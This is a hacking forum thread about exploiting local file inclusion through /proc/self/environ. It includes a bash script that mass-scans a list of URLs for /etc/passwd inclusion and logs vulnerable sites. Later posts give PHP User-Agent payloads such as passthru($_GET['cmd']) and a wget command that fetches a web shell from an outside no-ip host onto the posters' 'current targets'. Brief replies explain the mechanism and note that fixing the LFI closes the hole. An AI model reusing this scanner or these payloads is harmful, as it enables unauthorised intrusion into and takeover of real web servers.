LFI exploit running in the wild

[neusbeer]

There's a 'new' lfi attack being used a lot at this moment.
read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
in's a lfi with standard /etc/passwd inclusion, and right after that a check
for /proc/self/eviron
I never heard of this 'link'.. what is it?  I know it's from linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)


I made a script to check the exploit on a url list.
input a list with /etc/passwd in the url (example list)
and results in a logfile with /proc/self/eviron possible.
(after that tampering user-agent to get your shell up there :-))

Code: [Select]

#!/bin/bash
cat "$1" | while read url ; do
 test=$(curl "$url" | grep -i "root")
 if [ -z "$test" ]; then
   echo "No LFI in $url"
  else
   echo "LFI found in $url"
   echo "$url" >> output.log
  fi
done
cat output.log | sed 's/\/etc\/passwd/\/proc\/self\/environ/g' | while read url1 ; do
  test=$(curl "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then
    echo "No /proc/self/environ in $url1"
  else
   echo "/proc/self/environ found in $url1"
   echo "$url1" >> final_list.log
  fi
done

[imation]

saw this the other day, very interesting!

Ive been using TamperData for years now, brilliant tool

[neusbeer]

I don't.. I use mostly Fillder2 (gives me mostly the same results)..
Testing now that tamperdata script from firefox..
looks handy..

[ca0s]

/proc/self/environ contains environment variables for curren process.
In apache (idk if in another servers works too) it contains several fields of information, being one of them the User-agent of the client. If you can include /proc/self/environ and you set your user-agent to something like "<?php passthru($_GET['s']); ?>" that PHP code will be executed.

[neusbeer]

yes.. that's the idea!


only I'm struggling with the codes..


in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

[ande]

yes.. that's the idea!


only I'm struggling with the codes..


in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.

[FuyuKitsune]

Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI  + log poisoning).

[ca0s]

Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI  + log poisoning).

It is the same concept. You "poison" the logs with an user-agent containing PHP code and then execute it with a LFI. But you need read rights to those logs.

[neusbeer]

log poisioning is something different..


hmm and I still can't get the damn thing to work

[neusbeer]

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.

(sorry double post, but just saw this post)


maybe old.. but I just found out..
and why isn't it fixed by now ?


I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.


ow and php quote has to end with ?>  .. always?

[ande]

(sorry double post, but just saw this post)


maybe old.. but I just found out..
and why isn't it fixed by now ?


I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.

The /proc/self/environ is not an exploit or bug in itself. It is still just a LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.

ow and php quote has to end with ?>  .. always?

PHP tags are always <?php /* do shit here */ ?> or <? /* Do shit here */ ?> depending on version and usage etc.

[neusbeer]

ok... I've got the wrong examples then.. (about ending with ?>)
ty..